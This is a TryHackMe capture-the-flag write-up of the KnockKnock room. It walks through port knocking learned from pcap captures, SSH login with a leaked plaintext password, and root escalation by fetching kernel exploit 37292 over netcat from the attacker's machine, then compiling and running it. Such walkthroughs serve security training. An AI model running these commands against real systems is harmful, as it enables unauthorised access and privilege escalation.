KnockKnock (THM)

TryHackMe KnockKnock Write-Up

topics: port knocking, web application security, Linux Privilege Escalation

  1. Plan

  2. Enumeration

  3. Local Privilege Escalation

  4. Root Privilege Escalation

new tools: knock

tools: nmap, dirsearch, wireshark, ssh, gcc, nc

Plan

First we must distinguish what the difference is between port knocking and redirection/tunneling/forwarding (used interchangeably).

Their commonality lies in bypassing the firewall to reveal sensitive data or gain access to the machine.

Enumeration

initial nmap scan ./nmapAutomator.sh $ip Basic

explanation

Attempting to run a dirsearch scan on the server reveals no other subdirectories on the server

Navigating to the webpage, we have a link to a .pcap file that we can inspect with wireshark

First Port Knocking

Inspecting the file with wireshark

We know that we have to knock ports between a webserver and a client, lets filter the requests for TCP connections. From the initial ping (ICMP) requests, we can see the client is x.x.x.102 while the webserver is x.x.x.101.

We can see the client connected with the webserver on ports 7000, 8000, 9000 and 8888. We can use a tool knock to knock these ports. We can use a quick nmap scan to verify the now open port and navigate to it using a web browser.

knock $ip 7000 8000 9000 7000 8000 9000 8888 && nmap $ip

Because the firewall is configured to block these specific ports, we will have to run an additional knock command following the nmap scan. I attempted to use telnet or nc to connect to the server but it would simply refuse even after running the additional knock command.

The knock reveals that port 8888 becomes open, navigating to the now open port http://$ip:8888

This presents us with a hidden subdirectory. Navigating to /burgerworld reveals another .pcap file to inspect

Second Port Knocking

We know that a light green highlight indicates an HTTP exchange, lets inspect these packets first. The third one sticks out because it does not communicate with port 80 at all, which we have access to.

There is an odd looking message in this packet inspecting the raw hex code reveals potentially sensitive data.

So we have a hidden message that appears to be German.

We were correct in assuming the message was German. It says 1337, which is more than likely a name of a port. Attempting to navigate to this port results in a blocked connection, we can try knocking this port.

At first running the same command using port 1337 does not open the port. Inspecting the message more time, perhaps the spaces in the numbers are intentional.

knock $ip 1 3 3 7 && nmap -p1337 $ip

Navigating to http://$ip:1337 reveals another hidden subdirectory /iamcornholio. Inspecting the subdirectory

We are left with a string encoded in base64.

echo T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK | base64 --decode

Local Privilege Escalation

We are told that SSH is running on one of those four ports, if we knock them and login as butthead, we can gain local access to the webserver.

Third Port Knocking

knock $ip 8888 9999 7777 6666 && ssh butthead@$ip

Hmm, we are immediately logged out of the ssh server. Butthead's password nachosrule is in plaintext for us, maybe we can try running SSH and specifying an exact command to run.

ssh butthead@$ip /bin/sh

We do not have sudo -l permissions as butthead. Listing the kernel version with uname -a reveals kernel 3.13, vulnerable to exploit 37292.

Root Privilege Escalation

Copy the C code on the attacking machine and transfer with nc

nc -nlvp 4444 < exploit.c on attacker

Cd to /tmp and run nc <attackIP> 4444 > exploit.c on victim

Compile the exploit and run gcc exploit.c -o run && ./run

Last updated